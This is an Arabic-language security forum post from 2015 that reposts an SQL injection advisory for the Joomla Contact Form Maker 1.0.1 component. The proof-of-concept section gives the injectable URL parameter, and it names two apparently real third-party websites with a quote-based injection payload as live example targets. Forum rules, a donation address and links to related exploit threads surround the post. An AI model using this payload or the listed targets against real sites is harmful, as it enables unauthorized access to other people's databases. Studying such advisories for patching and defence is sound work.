TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 13-06-2015, 06:22 PM
الصورة الرمزية miutex
miutex
عضو مميز
 
حـالة التــواجـد : miutex غير متواجد حالياً
تاريخ التسجيل: Jun 2013
الجــــنــــــس: ذكـر
المشاركات: 102
شكراً:87
تم شكره 271 مرة في 63 مشاركة
معدل تقييم المستوى: 0
miutex بدون تقييم
افتراضي Joomla Contact Form Maker 1.0.1 SQL Injection

كود PHP:
[+]TitleJoomla Contact Form Maker v1.0.1 Component SQL injection vulnerability
[+]AuthorTUNISIAN CYBER
[+]Date29/03/2015
[+]Vendorhttp://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Contact Form Maker v1.0.1 suffersfrom an SQL injection vulnerability.
   
[+]
Proof Of Concept:
  
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
  
  
https
://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1' 
https://packetstormsecurity.com/file...Injection.html  

 

 

" يَرْفَعِ اللَّهُ الَّذِينَ آمَنُوا مِنكُمْ وَالَّذِينَ أُوتُوا الْعِلْمَ دَرَجَاتٍ وَاللَّهُ بِمَا تَعْمَلُونَ خَبِيرٌ"
سورة المجادلة
رد مع اقتباس
2 أعضاء قالوا شكراً لـ miutex على المشاركة المفيدة:

الكلمات الدلالية (Tags)
contact, form, injection, joomla, maker, sql


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[webapps / 0day] - WordPress Contact Form plugin inj3ct0r قسم جديد ثغرات مواقع الحماية 0 15-10-2011 01:40 PM
[webapps] - WordPress Easy Contact Form Lite plugin exploit-db قسم جديد ثغرات مواقع الحماية 0 18-08-2011 01:43 AM
[webapps / 0day] - WordPress Easy Contact Form Lite plugin inj3ct0r قسم جديد ثغرات مواقع الحماية 0 18-08-2011 01:43 AM
Joomla Component FDione Form Wizard lfi vulnerability Sec4ever قسم جديد ثغرات مواقع الحماية 0 14-05-2010 05:44 AM
Free Real Estate Contact Form v1.09 - Local File Inclusion Sec4ever قسم جديد ثغرات مواقع الحماية 0 16-03-2010 07:21 PM


الساعة الآن 08:35 AM